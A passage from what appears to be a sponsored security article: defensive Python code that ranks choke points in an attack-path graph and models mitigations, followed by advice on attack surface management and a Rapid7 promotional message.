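def choke_points(paths) -> List[Tuple[str, int]]:
    """Intermediate nodes ranked by how many paths run through them; fixing
    the top one removes the most paths for the least effort."""
    counts = Counter(n for p in paths for n in p[1:-1])
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def paths_after_mitigation(edges, node, sources, targets) -> List[List[str]]:
    """Model a fix (e.g. moving an admin to a tiered account and clearing the
    cached credentials) by removing the node and recomputing the paths."""
    kept = [(a, b) for a, b in edges if node not in (a, b)]
    return attack_paths(build_graph(kept), set(sources) - {node}, targets)


if __name__ == "__main__":
    paths = attack_paths(build_graph(EDGES), INTERNET_EXPOSED, CROWN_JEWELS)
    for p in paths:
        print(" -> ".join(p))
    ranked = choke_points(paths)
    print("choke points:", ranked)
    top = ranked[0][0]
    print("paths left after fixing", top, ":",
          len(paths_after_mitigation(EDGES, top, INTERNET_EXPOSED, CROWN_JEWELS)))
```

The same query answers the investigation question in the paragraph above: given an alert on one host, the paths through that host show which accounts and systems an intruder could reach next, and the choke-point ranking tells the asset owner which single fix collapses the most of them.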

Consider CAASM and ASM as foundational elements to a strong, mature security program that is aware of its entire digital estate. This visibility eliminates one of the ways attackers take organizations by surprise, thereby reducing overall risk.

Message from the Sponsor

The dynamic nature of modern IT environments demands a proactive and continuous approach to exposure management. Doing so requires real-time visibility into your entire digital estate and the exposures that leave your organization vulnerable to compromise. By enriching unified internal and external views of your attack surface with real-world threat intelligence and context from your entire tooling ecosystem, teams have the situational awareness needed to prioritize response efforts and accelerate mean time to remediation. Watch this on-demand demo to learn how Rapid7 Exposure Command can help transform your security program and allow you to take command of your attack surface.